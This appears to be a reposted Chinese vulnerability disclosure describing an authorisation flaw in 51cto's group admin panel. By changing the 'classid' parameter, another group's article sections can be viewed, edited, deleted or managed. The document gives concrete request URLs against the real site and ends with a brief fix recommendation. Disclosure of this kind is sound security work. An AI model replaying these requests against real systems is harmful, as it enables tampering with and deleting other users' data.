来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 第一/二处:新建文章区/编辑登陆圈子后台后 (没有自己的圈子要先去注册一个)访问 http://g.51cto.com/groupadmin.php?action=diyclassjob=editgid=3643classid=3136通过修改classid的值可以查看 修改其他......
 第一/二处:新建文章区/编辑
登陆圈子后台后 (没有自己的圈子要先去注册一个)访问 http://g.51cto.com/groupadmin.php?action=diyclass&job=edit&gid=3643&classid=3136
通过修改"classid"的值可以查看 修改其他圈子的信息
例:
http://g.51cto.com/groupadmin.php?action=diyclass&job=edit&gid=3643&classid=313
 第三处:删除文章区
http://g.51cto.com/groupadmin.php?action=diyclass&job=del&gid=3643&classid=3135
"classid"修改为一个存在的值 即可删除
由于这个具有一定破坏性我就不再重现了 漏洞是存在的
第四处:管理文章区
http://g.51cto.com/groupadmin.php?action=diyclassart&gid=3643&classid=3135
同理
例:
http://g.51cto.com/groupadmin.php?action=diyclassart&gid=3643&classid=313
 修复方案:
加强权限验证体系
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
